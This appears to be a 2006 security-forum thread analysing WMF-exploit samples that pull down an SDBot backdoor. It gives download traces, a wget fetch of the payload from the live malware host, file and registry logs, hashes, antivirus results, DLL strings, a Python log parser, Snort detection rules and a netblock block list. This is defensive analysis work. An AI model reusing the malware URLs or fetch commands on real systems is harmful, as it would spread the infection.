more win_wmf


Thanks to seville we have more WMF stuff. These go out to a site and download a new file.
Here's some pretty pictures:

So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
Server: Apache/ProXad [Sep  2 2005 07:02:45]
Last-Modified: Sat, 31 Dec 2005 21:55:15 GMT
ETag: "9ea779-d134-43b6fe43"
Content-Length: 53556
Content-Type: image/jpeg



C:\malware>wget --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
--00:10:27--  http://charmedmadgic.free.fr/sdbot05b.jpg
           => `sdbot05b.jpg'
Resolving charmedmadgic.free.fr... done.
Connecting to charmedmadgic.free.fr[212.27.63.117]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53,556 [image/jpeg]

100%[====================================>] 53,556        24.98K/s    ETA 00:00

00:10:30 (24.98 KB/s) - `sdbot05b.jpg' saved [53556/53556]



FIRST PACKET
0000   00 06 25 62 de 56 00 0c 29 7e 41 d5 08 00 45 00  ..%b.V..)~A...E.
0010   00 30 3e d5 40 00 80 06 e6 53 c0 a8 01 66 d4 1b  .0>.@....S...f..
0020   3f 75 04 e9 00 50 59 73 42 34 00 00 00 00 70 02  ?u...PYsB4....p.
0030   fa f0 11 af 00 00 02 04 05 b4 01 01 04 02        ..............


212.27.63.117 TCP 1257 > 80

FIRST CHUNK OF FILE:

MZKERNEL32.DLL..PE..L......@..P.v4.|H.....LoadLibraryA...........`....@...............9..........P.................................
............A..............v8.P.>..@M.j'Y...v.............GetProcAddress.......


CREATED FILES:
2915	10:24:46 PM	cscript.exe:1520	CREATE	C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\sdbot05b[1].jpg	SUCCESS	Options: Create  Access: All	
3683	10:24:48 PM	cscript.exe:1520	CREATE	C:\command.pif	SUCCESS	Options: OverwriteIf Sequential  Access: All	
4459	10:24:48 PM	command.pif:512	CREATE	C:\WINDOWS\System32\taskdrv32.exe	SUCCESS	Options: OverwriteIf Sequential  Access: All	

WRITTEN FILES:
10:24:44 PM	cmd.exe:596	WRITE 	C:\dl.vbs	SUCCESS	Offset: 0 Length: 173	
10:24:45 PM	dwwin.exe:192	WRITE 	C:\DOCUME~1\macdaddy\LOCALS~1\Temp\58B624.dmp	SUCCESS	Offset: 0 Length: 32	
10:24:46 PM	cscript.exe:1520	WRITE 	C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\sdbot05b[1].jpg	SUCCESS	Offset: 0 Length: 797	
10:24:48 PM	cscript.exe:1520	WRITE 	C:\command.pif	SUCCESS	Offset: 0 Length: 2048	
10:24:48 PM	cmd.exe:596	WRITE 	C:\command.pif	SUCCESS	Offset: 0 Length: 57344	
10:24:48 PM	command.pif:512	WRITE 	C:\WINDOWS\System32\taskdrv32.exe	SUCCESS	Offset: 0 Length: 53556	

REGISTRY ENTRIES

1000    8.65035343      cscript.exe:1520        CreateKey       HKLM\SOFTWARE\Microsoft\Cryptography\RNG        SUCCESS Access: 0x2
1058    8.65464306      cscript.exe:1520        CreateKey       HKLM\Software\Microsoft\Windows Script Host\Settings    SUCCESS Access: 0x20019
1315    8.70439243      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing     SUCCESS Access: 0x20019
1866    9.42009163      cscript.exe:1520        CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F
1906    9.42257881      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders      SUCCESS Access: 0x2000000
2892    9.51492786      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon      SUCCESS Access: 0x2001F
3030    9.52157402      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders   SUCCESS Access: 0x2000000
3047    9.52200317      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections    SUCCESS Access: 0x1
3064    9.52283478      cscript.exe:1520        CreateKey       HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections    SUCCESS Access: 0x2
3190    9.52878380      cscript.exe:1520        CreateKey       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters SUCCESS Access: 0x20019
5639    13.02172852     command.pif:512 CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F
5731    13.02852345     command.pif:512 CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders      SUCCESS Access: 0x2000000
5734    13.02862072     command.pif:512 CreateKey       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders   SUCCESS Access: 0x2000000
5943    13.04866695     command.pif:512 CreateKey       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters SUCCESS Access: 0x20019
6656    13.37349129     taskdrv32.exe:1236      CreateKey       HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings        SUCCESS Access: 0x2001F


NEW PROCESS

iedld32.dll


bg_wmf.evil
434017cc7591950ab0378d464fb03f97
c8996a4a1ae88ff06f2b94812ad461d554584cb8
83984c8fdba4fdfacd9c74060200475eb92d6639f0dd05b4992bf24e9c7cf496

AntiVir	Found Exploit/IMG.WMF exploit
ArcaVir Found Trojan.Downloader.Agent.Acd
Avast 	Found Win32:Exdown
AVG Antivirus 	Found nothing
BitDefender 	Found Exploit.Win32.WMF-PFV
ClamAV 	Found Exploit.WMF.A
Dr.Web 	Found nothing
F-Prot Antivirus	Found nothing
Fortinet 	Found W32/WMF-exploit
Kaspersky Anti-Virus 	Found Exploit.Win32.IMG-WMF (probable variant)
NOD32 	Found Win32/TrojanDownloader.Wmfex
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found nothing


foto_wmf.evil
62589a55c684debd42e88675875fee5a
2fff2d0f80d802ebbdf187c931b735997a079737
07d6b0de82e129701c2de81764beeb8667bbe52fb8e9a34314a9f09775345b76

AntiVir  	Found Exploit/IMG.WMF exploit
ArcaVir 	Found nothing
Avast 	Found Win32:Exdown
AVG Antivirus 	Found nothing
BitDefender 	Found Exploit.Win32.WMF-PFV
ClamAV 	Found Exploit.WMF.A
Dr.Web 	Found nothing
F-Prot Antivirus	Found security risk or a "backdoor" program
Fortinet 	Found W32/WMF-exploit
Kaspersky Anti-Virus 	Found Exploit.Win32.IMG-WMF (probable variant)
NOD32 	Found Win32/TrojanDownloader.Wmfex
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found Trojan-Downloader.Win32.Agent.acd 


command.pif
47e7a160296eab339c615f8cb4e4cbc6
d2715bc39a44e250f05f2ed77f30173b78cbab0d
107c830f6914e4c3264bf5fc56ce9ff22a920971d87b3dcc6f6d9095e2b2ccd8

AntiVir  	Found nothing
ArcaVir 	Found Win32
Avast 	Found nothing
AVG Antivirus 	Found IRC/BackDoor.SdBot.SCA
BitDefender 	Found nothing
ClamAV 	Found nothing
Dr.Web 	Found nothing
F-Prot Antivirus	Found W32/Sdbot.NZJ
Fortinet 	Found nothing
Kaspersky Anti-Virus 	Found Backdoor.Win32.SdBot.gen
NOD32 	Found probably a variant of Win32/Rbot (probable variant)
Norman Virus Control 	Found W32/SDBot.VTZ
UNA 	Found nothing
VBA32 	Found Backdoor.Win32.SdBot.gen 


sdbot05b.jpg
47e7a160296eab339c615f8cb4e4cbc6
d2715bc39a44e250f05f2ed77f30173b78cbab0d
107c830f6914e4c3264bf5fc56ce9ff22a920971d87b3dcc6f6d9095e2b2ccd8

cscript.exe
00f7e24a0be30a4fe529802c939a9291
bc6a4f2420db34ad83279063b652bdf8fec0ccc3
cd9ac5b63bb9f6e616fdd576fb81d9375099d00ed339abc9ae433fdb6b459ce1

iedld32.dll
1a568c2a4bb4d3c967286dcf257ce260
e21eb387ef31d0474d1f327bcee2d6ccde117e83
edcc477514c0c340fb3a4f815f01ca01785623d608f3d441f3526f5ab57b3789

AntiVir  	Found nothing
ArcaVir 	Found nothing
Avast 	Found nothing
AVG Antivirus 	Found nothing
BitDefender 	Found nothing
ClamAV 	Found nothing
Dr.Web 	Found DLOADER.Trojan (probable variant)
F-Prot Antivirus	Found nothing
Fortinet 	Found nothing
Kaspersky Anti-Virus 	Found nothing
NOD32 	Found nothing
Norman Virus Control 	Found nothing
UNA 	Found nothing
VBA32 	Found Downloader.Small.54 (probable variant) 

STRINGS for iedld32.dll

0000004D   1000004D      0   !This program cannot be run in DOS mode.
000000A8   100000A8      0   Rich5
000001C0   100001C0      0   .text
00000210   10000210      0   .rdata
00000237   10000237      0   @.data
00000260   10000260      0   .reloc
00001B92   10004192      0   CloseHandle
00001BA0   100041A0      0   CreateFileA
00001BAE   100041AE      0   CreateProcessA
00001BC0   100041C0      0   CreateThread
00001BD0   100041D0      0   GetComputerNameA
00001BE4   100041E4      0   GetCurrentProcessId
00001BFA   100041FA      0   GetFileAttributesA
00001C10   10004210      0   GetFileSize
00001C1E   1000421E      0   GetFullPathNameA
00001C32   10004232      0   GetLocaleInfoA
00001C44   10004244      0   GetModuleFileNameA
00001C5A   1000425A      0   GetModuleHandleA
00001C6E   1000426E      0   GetProcAddress
00001C80   10004280      0   GetSystemDirectoryA
00001C96   10004296      0   GetTickCount
00001CA6   100042A6      0   GetVersionExA
00001CB6   100042B6      0   GetVolumeInformationA
00001CCE   100042CE      0   HeapAlloc
00001CDA   100042DA      0   HeapCreate
00001CE8   100042E8      0   HeapDestroy
00001CF6   100042F6      0   HeapFree
00001D02   10004302      0   MoveFileExA
00001D10   10004310      0   RtlMoveMemory
00001D20   10004320      0   VirtualAlloc
00001D30   10004330      0   VirtualFree
00001D3E   1000433E      0   VirtualProtect
00001D50   10004350      0   WaitForSingleObject
00001D66   10004366      0   WideCharToMultiByte
00001D7C   1000437C      0   WriteFile
00001D88   10004388      0   WritePrivateProfileStringA
00001DA6   100043A6      0   lstrcatA
00001DB2   100043B2      0   lstrcpyA
00001DBE   100043BE      0   lstrlenA
00001DC8   100043C8      0   KERNEL32.dll
00001DD8   100043D8      0   wsprintfA
00001DE4   100043E4      0   CallNextHookEx
00001DF6   100043F6      0   CharLowerA
00001E04   10004404      0   CharUpperA
00001E12   10004412      0   SetWindowsHookExA
00001E26   10004426      0   UnhookWindowsHookEx
00001E3A   1000443A      0   USER32.dll
00001EA0   100044A0      0   hidefile.dll
00001EAD   100044AD      0   InitDownloader
00001EBC   100044BC      0   MessageHandler
00001ECB   100044CB      0   SwitchOff
00001ED5   100044D5      0   SwitchOn
00002008   10005008      0   NTDLL.DLL
00002012   10005012      0   NtClose
0000201A   1000501A      0   NtOpenFile
00002025   10005025      0   NtOpenProcess
00002033   10005033      0   NtQueryDirectoryFile
00002048   10005048      0   NtQuerySystemInformation
00002061   10005061      0   NtQueryInformationProcess
0000207B   1000507B      0   NtReadVirtualMemory
0000208F   1000508F      0   RtlInitUnicodeString
000020A4   100050A4      0   strcmp
000020CF   100050CF      0   KERNEL32.DLL
000020DC   100050DC      0   FindNextFileA
000020EA   100050EA      0   Process32Next
000020F8   100050F8      0   RegisterServiceProcess
0000210F   1000510F      0   lstrcmpA
00002174   10005174      0   WININET.DLL
00002184   10005184      0   InternetGetConnectedState
0000219E   1000519E      0   InternetCloseHandle
000021B2   100051B2      0   InternetOpenA
000021C0   100051C0      0   InternetOpenUrlA
000021D1   100051D1      0   InternetSetFilePointer
000021E8   100051E8      0   InternetReadFile
00002211   10005211      0   IEXPLORE.EXE
0000232E   1000532E      0   Rename
00002335   10005335      0   WININIT.INI
00002341   10005341      0   userid=
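
As an added example (not part of the original post), the following Python pulls the chain shown above out of Filemon-style lines: a script host (cscript.exe or cmd.exe) writing a file with an executable extension such as .pif, and the payload reappearing in System32 with the same size as the 53,556-byte download. The sample log is constructed to mirror the WRITTEN FILES output; the user name and the exact tab-separated field layout are assumptions.

```python
import re

# Constructed Filemon-style lines modelled on the WRITTEN FILES output above
# (time, process:pid, operation, path, result, detail); the user name is made up.
SAMPLE_LOG = """\
10:24:44 PM\tcmd.exe:596\tWRITE \tC:\\dl.vbs\tSUCCESS\tOffset: 0 Length: 173
10:24:46 PM\tcscript.exe:1520\tWRITE \tC:\\Documents and Settings\\user\\Local Settings\\Temporary Internet Files\\Content.IE5\\Y1SKCUOY\\sdbot05b[1].jpg\tSUCCESS\tOffset: 0 Length: 797
10:24:48 PM\tcscript.exe:1520\tCREATE\tC:\\command.pif\tSUCCESS\tOptions: OverwriteIf Sequential  Access: All
10:24:48 PM\tcmd.exe:596\tWRITE \tC:\\command.pif\tSUCCESS\tOffset: 0 Length: 57344
10:24:48 PM\tcommand.pif:512\tWRITE \tC:\\WINDOWS\\System32\\taskdrv32.exe\tSUCCESS\tOffset: 0 Length: 53556
"""

# Assumed layout: time, process:pid, operation, path, result, optional detail.
LINE_RE = re.compile(
    r"^(?P<time>\d{1,2}:\d{2}:\d{2} [AP]M)\t(?P<proc>[^:\t]+):(?P<pid>\d+)\t"
    r"(?P<op>\w+)\s*\t(?P<path>[^\t]+)\t(?P<result>\w+)(?:\t(?P<detail>.*))?"
)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "cmd.exe"}
EXEC_EXT = (".exe", ".pif", ".scr", ".com", ".bat", ".dll")

def parse(log):
    """Turn Filemon lines into dicts; lines that do not match the layout are skipped."""
    return [m.groupdict() for m in (LINE_RE.match(line) for line in log.splitlines()) if m]

def suspicious_drops(log, download_size=None):
    """Return (time, process, reason, path) for executable drops worth a second look.
    download_size, if given, is the Content-Length of the fetched 'image', so a
    System32 drop of exactly that size is called out as the relocated payload."""
    hits = []
    for ev in parse(log):
        if ev["op"].upper() not in ("CREATE", "WRITE"):
            continue
        path, proc = ev["path"].lower(), ev["proc"].lower()
        if not path.endswith(EXEC_EXT):
            continue
        if proc in SCRIPT_HOSTS:
            hits.append((ev["time"], ev["proc"], "script host wrote executable", ev["path"]))
        elif "\\system32\\" in path:
            reason = "executable written to System32"
            m = re.search(r"Length: (\d+)", ev["detail"] or "")
            if download_size and m and int(m.group(1)) == download_size:
                reason += " (same size as downloaded payload)"
            hits.append((ev["time"], ev["proc"], reason, ev["path"]))
    return hits
```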

Oink!

# General - any port 80 to known bad www server
alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider for WMF exploit";sid:66600003;rev:1;)

# Specific to server and file name
alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider downloading sdbot05b.jpg for WMF exploit";content:"sdbot05b.jpg";nocase;sid:66600004;rev:1;)

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

SANS suggests blocking

----
"I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:

InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)"

--------------
This is different from the 212.27.63.117 mentioned above.

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

Just in case ....

In case you run into a layer 8 problem when it comes to blocking ....

alert tcp $HOME_NET any -> [69.50.160.0/19,85.255.112.0/20] any (msg:"[OFFENSIVE COMPUTING] Traffic to naughty netblocks - MSF";refrence:url,http://isc.sans.org/diary.php?storyid=997;sid:66600005;rev:1;)

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

Flow and spelling

Note: I used this but added a flow:to_server and the reference keyword is misspelled.

Thanks Delchi!

Thanks! I can't go back and edit it, but I'll come up with a repository option soon!

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior